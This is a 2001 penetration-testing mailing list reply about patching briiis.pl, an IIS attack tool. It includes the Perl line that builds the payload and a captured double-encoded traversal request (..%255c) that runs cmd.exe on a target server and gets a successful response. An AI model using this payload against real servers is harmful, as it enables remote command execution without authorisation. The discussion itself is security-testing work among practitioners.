Penetration Testing mailing list archives
Re: iXsecurity.tool.briiis.3.02
From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Thu, 14 Jun 2001 10:35:53 +0200
Sigtrap wrote :
Nicolas Gregoire writes:$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"Have Nicolas tested his change before mailing pen-test? If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c) will fail due to the last '../'.
I, of course, tested it before sending the patch ... and it works fine for me. Here an Ethereal capture (done with "./briiis.pl -s XXXXXX -v -F %255c"): GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\+/a HTTP/1.0 Host: XXXXXXXXXXXXX HTTP/1.1 200 OK
Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)
No, briiis.pl is a tool. Just a tool. Like guns. And policemen and robbers both have guns ... ;-) Nicob
Current thread:
- iXsecurity.tool.briiis.3.02 ian . vitek (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 H D Moore (Jun 13)
- <Possible follow-ups>
- RE: iXsecurity.tool.briiis.3.02 Colby Rice (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Sigtrap (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 14)
- Re: iXsecurity.tool.briiis.3.02 Alex Butcher (Jun 15)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)